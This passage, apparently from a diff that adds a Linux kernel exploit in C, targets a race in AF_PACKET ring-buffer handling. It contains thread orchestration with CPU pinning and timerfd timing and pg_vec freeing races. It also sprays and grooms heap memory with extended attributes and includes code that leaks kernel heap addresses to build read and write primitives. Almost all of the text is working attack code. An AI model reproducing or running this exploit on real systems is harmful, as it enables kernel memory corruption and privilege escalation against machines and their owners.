pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd) +{ + struct timerfd_waitlist_thread *t = Calloc(1, sizeof(*t)); + t->tid = -1; + t->timerfd = timerfd; + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, timerfd_waitlist_thread_fn, t); + return t; +} + +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t) +{ + timerfd_waitlist_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct pg_vec_lock_thread_work *pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex) +{ + struct pg_vec_lock_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->ifindex = ifindex; + return w; +} + +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w) +{ + free(w); +} + +void *pg_vec_lock_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_lock_thread *t = arg; + t->tid = gettid(); + + Setpriority(PRIO_PROCESS, 0, MAX_NICE); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_lock_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct sockaddr_ll addr = { .sll_ifindex = work->ifindex }; + struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr) }; + syscall(SYS_sendmsg, work->victim_packet_socket->fd, &msg, 0); + + pg_vec_lock_thread_work_destroy(work); + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t) +{ + while (!thread_in_sleep_state(t->tid)) { + ; + } + + struct timespec pg_vec_lock_acquire_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &pg_vec_lock_acquire_time); + return pg_vec_lock_acquire_time; +} + +void pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void) +{ + struct pg_vec_lock_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + t->packet_socket = -1; + t->ifindex = -1; + Pthread_create(&t->handle, NULL, pg_vec_lock_thread_fn, t); + return t; +} + +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t) +{ + pg_vec_lock_thread_quit(t); + free(t); +} + +struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +) +{ + struct pg_vec_buffer_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->exploit = exploit; + w->cleanup = cleanup; + return w; +} + +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w) +{ + free(w); +} + +void *pg_vec_buffer_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_buffer_thread *t = arg; + t->tid = gettid(); + + int reclaim_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_buffer_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + if (work->exploit) { + struct tpacket_req3 free_pg_vec_req = {}; + syscall( + SYS_setsockopt, + work->victim_packet_socket->fd, + SOL_PACKET, + PACKET_RX_RING, + &free_pg_vec_req, + sizeof(free_pg_vec_req) + ); + + alloc_pages(reclaim_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE); + } + + if (work->cleanup) { + free_pages(reclaim_pg_vec_packet_socket); + } + + pg_vec_buffer_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + Close(reclaim_pg_vec_packet_socket); + return NULL; +} + +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_buffer_thread *pg_vec_buffer_thread_create(void) +{ + struct pg_vec_buffer_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + Pthread_create(&t->handle, NULL, pg_vec_buffer_thread_fn, t); + return t; +} + +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t) +{ + pg_vec_buffer_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +) +{ + struct tpacket_rcv_thread_work *w = Calloc(1, sizeof(*w)); + w->pg_vec_lock_release_time = pg_vec_lock_release_time; + w->decrease_tpacket_rcv_thread_sleep_time = decrease_tpacket_rcv_thread_sleep_time; + w->msg = msg; + return w; +} + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w) +{ + msghdr_destroy(w->msg); + free(w); +} + +void *tpacket_rcv_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct tpacket_rcv_thread *t = arg; + + int trigger_sendmsg_packet_socket = Socket(AF_PACKET, SOCK_PACKET, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct tpacket_rcv_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct timespec cur_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &cur_time); + struct timespec remaining_time_before_pg_vec_lock_release = timespec_sub( + work->pg_vec_lock_release_time, + cur_time + ); + + struct timespec sleep_duration = timespec_sub( + remaining_time_before_pg_vec_lock_release, + work->decrease_tpacket_rcv_thread_sleep_time + ); + + syscall(SYS_nanosleep, &sleep_duration, NULL); + syscall(SYS_sendmsg, trigger_sendmsg_packet_socket, work->msg, 0); + tpacket_rcv_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void tpacket_rcv_thread_send_work(struct tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void) +{ + struct tpacket_rcv_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, tpacket_rcv_thread_fn, t); + return t; +} + +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t) +{ + tpacket_rcv_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +) +{ + void *copy_data = Calloc(1, datalen); + if (data) + memcpy(copy_data, data, datalen); + + struct iovec *iov = Calloc(1, sizeof(*iov)); + iov->iov_base = copy_data; + iov->iov_len = datalen; + + struct sockaddr_pkt *addr = Calloc(1, sizeof(*addr)); + snprintf((char *)addr->spkt_device, sizeof(addr->spkt_device), "%s", devname); + struct msghdr *msghdr = Calloc(1, sizeof(*msghdr)); + msghdr->msg_namelen = sizeof(struct sockaddr_pkt); + msghdr->msg_name = addr; + msghdr->msg_iov = iov; + msghdr->msg_iovlen = 1; + return msghdr; +} + +void msghdr_destroy(struct msghdr *msghdr) +{ + struct iovec *iov = msghdr->msg_iov; + size_t iov_len = msghdr->msg_iovlen; + for (size_t i = 0; i < iov_len; i++) + free(iov[i].iov_base); + + free(iov); + struct sockaddr_pkt *addr = msghdr->msg_name; + free(addr); + free(msghdr); +} + +struct necessary_threads *necessary_threads_create(int timerfd) +{ + struct necessary_threads *nt = Calloc(1, sizeof(*nt)); + + nt->timerfd_waitlist_threads = Calloc(TOTAL_TIMERFD_WAITLIST_THREADS, sizeof(*nt->timerfd_waitlist_threads)); + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + nt->timerfd_waitlist_threads[i] = timerfd_waitlist_thread_create(timerfd); + + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_wait_unshare_complete(nt->timerfd_waitlist_threads[i]); + + nt->pg_vec_lock_thread = pg_vec_lock_thread_create(); + nt->pg_vec_buffer_thread = pg_vec_buffer_thread_create(); + nt->tpacket_rcv_thread = tpacket_rcv_thread_create(); + + return nt; +} + +void necessary_threads_destroy(struct necessary_threads *nt) +{ + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_destroy(nt->timerfd_waitlist_threads[i]); + + pg_vec_lock_thread_destroy(nt->pg_vec_lock_thread); + pg_vec_buffer_thread_destroy(nt->pg_vec_buffer_thread); + tpacket_rcv_thread_destroy(nt->tpacket_rcv_thread); + free(nt); +} + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; + } + + filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(size_t); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 38, // packet_reserve + filter // filter + ); + + struct simple_xattr_request *simple_xattr_request = NULL; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + char value[XATTR_SIZE_MAX] = {}; + char name[XATTR_NAME_MAX + 1] = {}; + snprintf(name, sizeof(name), PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT, i); + snprintf(value, sizeof(value), PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, i); + simple_xattr_request = simple_xattr_request_create( + PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, + name, + value, + KMALLOC_8K_SIZE + ); + + primitive->simple_xattr_requests[i] = simple_xattr_request; + } +} + +void pages_order2_read_primitive_cleanup(struct pages_order2_read_primitive *primitive) +{ + if (primitive->victim_packet_socket_config) { + victim_packet_socket_config_destroy(primitive->victim_packet_socket_config); + primitive->victim_packet_socket_config = NULL; + } + + if (primitive->drain_pages_order2_packet_socket != -1) { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + } + + if (primitive->drain_pages_order3_packet_socket_1 != -1) { + Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + } + + if (primitive->drain_pages_order3_packet_socket_2 != -1) { + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if (primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + + simple_xattr_request_destroy(primitive->simple_xattr_requests[i]); + primitive->simple_xattr_requests[i] = NULL; + } + + if (primitive->overflowed_simple_xattr_request) { + if (primitive->overflowed_simple_xattr_request->allocated) { + Removexattr( + primitive->overflowed_simple_xattr_request->filepath, + primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->overflowed_simple_xattr_request); + primitive->overflowed_simple_xattr_request = NULL; + } + } + + if (primitive->leaked_content_simple_xattr_request) { + if (primitive->leaked_content_simple_xattr_request->allocated) { + Removexattr( + primitive->leaked_content_simple_xattr_request->filepath, + primitive->leaked_content_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->leaked_content_simple_xattr_request); + primitive->leaked_content_simple_xattr_request = NULL; + } + } +} + +void pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 1024, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 1024, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 512, PAGES_ORDER3_SIZE); +} + +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + Setxattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name, + primitive->simple_xattr_requests[i]->value, + primitive->simple_xattr_requests[i]->value_size, + XATTR_CREATE + ); + + primitive->simple_xattr_requests[i]->allocated = true; + } + + for (int i = 512; i < ARRAY_SIZE(primitive->simple_xattr_requests); i += 128) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } +} + +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + if (primitive->simple_xattr_requests[i] && primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + } +} + +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(size_t *)(packet_data) = XATTR_SIZE_MAX; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + pages_order2_read_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + pages_order2_read_primitive_setup_simple_xattr(primitive); + + pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool pages_order2_read_primitive_build_primitive( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +) +{ + pages_order2_read_primitive_main_work( + primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + decrease_tpacket_rcv_thread_sleep_time, + timer_interrupt_amplitude + ); + + struct simple_xattr_request *overflowed_request = NULL; + struct simple_xattr_request *simple_xattr_request = NULL; + bool overflow_success = false; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY && !overflow_success; i++) { + char value[KMALLOC_8K_SIZE] = {}; + + simple_xattr_request = primitive->simple_xattr_requests[i]; + if (!simple_xattr_request || !simple_xattr_request->allocated) + continue; + + ssize_t getxattr_ret = getxattr( + simple_xattr_request->filepath, + simple_xattr_request->name, + value, + KMALLOC_8K_SIZE + ); + + if (getxattr_ret < 0 && errno == ERANGE) { + primitive->overflowed_simple_xattr_request = simple_xattr_request; + primitive->simple_xattr_requests[i] = NULL; + overflow_success = true; + } + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + pages_order2_read_primitive_page_drain_cleanup(primitive); + + if (!overflow_success) { + pages_order2_read_primitive_cleanup_simple_xattr(primitive); + } else { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + return overflow_success; +} + +struct pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +) +{ + struct pages_order2_read_primitive pages_order2_read_primitive = {}; + pages_order2_read_primitive_init(&pages_order2_read_primitive); + + struct timespec pages_order2_read_primitive_sleep_decrease_amplitude = { .tv_nsec = 5000 }; + struct timespec pages_order2_read_primitive_timer_interrupt_amplitude = { .tv_nsec = 167000 }; + + bool pages_order2_read_primitive_build_success = false; + while (!pages_order2_read_primitive_build_success) { + pages_order2_read_primitive_build_success = pages_order2_read_primitive_build_primitive( + &pages_order2_read_primitive, + necessary_threads, + configure_network_interface_socket, + timerfd, + pages_order2_read_primitive_sleep_decrease_amplitude, + pages_order2_read_primitive_timer_interrupt_amplitude + ); + + if (pages_order2_read_primitive_build_success) { + fprintf(stderr, "pages_order2_read_primitive_build_success\n"); + if (!pages_order2_read_primitive_build_leaked_simple_xattr(&pages_order2_read_primitive)) { + pages_order2_read_primitive_cleanup(&pages_order2_read_primitive); + pages_order2_read_primitive_init(&pages_order2_read_primitive); + pages_order2_read_primitive_build_success = false; + } + + if (!pages_order2_read_primitive_build_success) { + fprintf(stderr, "pages_order2_read_primitive_build_success become fail\n"); + } + } + } + + return pages_order2_read_primitive; +} + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive) +{ + void *leak_data = Calloc(1, XATTR_SIZE_MAX); + Getxattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name, + leak_data, + XATTR_SIZE_MAX + ); + + return leak_data; +} + +bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive) +{ + void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + struct simple_xattr *leaked_simple_xattrs = tmp + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + struct simple_xattr *leaked_simple_xattr = NULL; + int leaked_simple_xattr_count = (XATTR_SIZE_MAX - (PAGES_ORDER2_SIZE - sizeof(struct simple_xattr))) / PAGES_ORDER2_SIZE; + int simple_xattr_requests_idx = -1; + int leaked_simple_xattrs_idx = -1; + bool found_leaked_simple_xattr = false; + + for (int i = 0; i < leaked_simple_xattr_count && !found_leaked_simple_xattr; i++) { + leaked_simple_xattr = &leaked_simple_xattrs[i]; + + if (!is_data_look_like_simple_xattr(leaked_simple_xattr, KMALLOC_8K_SIZE)) + continue; + else { + simple_xattr_dump(leaked_simple_xattr); + } + + u8 *leaked_simple_xattr_value = leaked_simple_xattr->value; + + if ( + strncmp( + leaked_simple_xattr_value, + PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN, + strlen(PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN) + ) != 0 + ) { + continue; + } + + if (sscanf(leaked_simple_xattr_value, PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, &simple_xattr_requests_idx) != 1) + continue; + + if (simple_xattr_requests_idx < 0 || simple_xattr_requests_idx >= TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY) + continue; + + pages_order2_read_primitive->leaked_content_simple_xattr_request = pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx]; + pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx] = NULL; + leaked_simple_xattrs_idx = i; + found_leaked_simple_xattr = true; + } + + if (!found_leaked_simple_xattr) { + free(tmp); + + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + pages_order2_read_primitive_cleanup_simple_xattr(pages_order2_read_primitive); + return false; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if (pages_order2_read_primitive->simple_xattr_requests[i] && pages_order2_read_primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + pages_order2_read_primitive->simple_xattr_requests[i]->filepath, + pages_order2_read_primitive->simple_xattr_requests[i]->name + ); + + pages_order2_read_primitive->simple_xattr_requests[i]->allocated = false; + } + } + + free(tmp); + tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + leaked_simple_xattrs = tmp + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + leaked_simple_xattr = &leaked_simple_xattrs[leaked_simple_xattrs_idx]; + + u64 parent = (u64)(__rb_parent(leaked_simple_xattr->rb_node.__rb_parent_color)); + u64 left = (u64)(leaked_simple_xattr->rb_node.rb_left); + u64 right = (u64)(leaked_simple_xattr->rb_node.rb_right); + + pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = parent ? parent : (left ? left : right); + pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE; + + printf("[DEBUG] pages_order2_read_primitive->overflowed_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->overflowed_simple_xattr_kernel_address); + printf("[DEBUG] pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address); + + free(tmp); + return true; +} + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) + primitive->spray_pg_vec_packet_sockets[i] = Socket(AF_PACKET, SOCK_RAW, 0); + + primitive->overflowed_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + 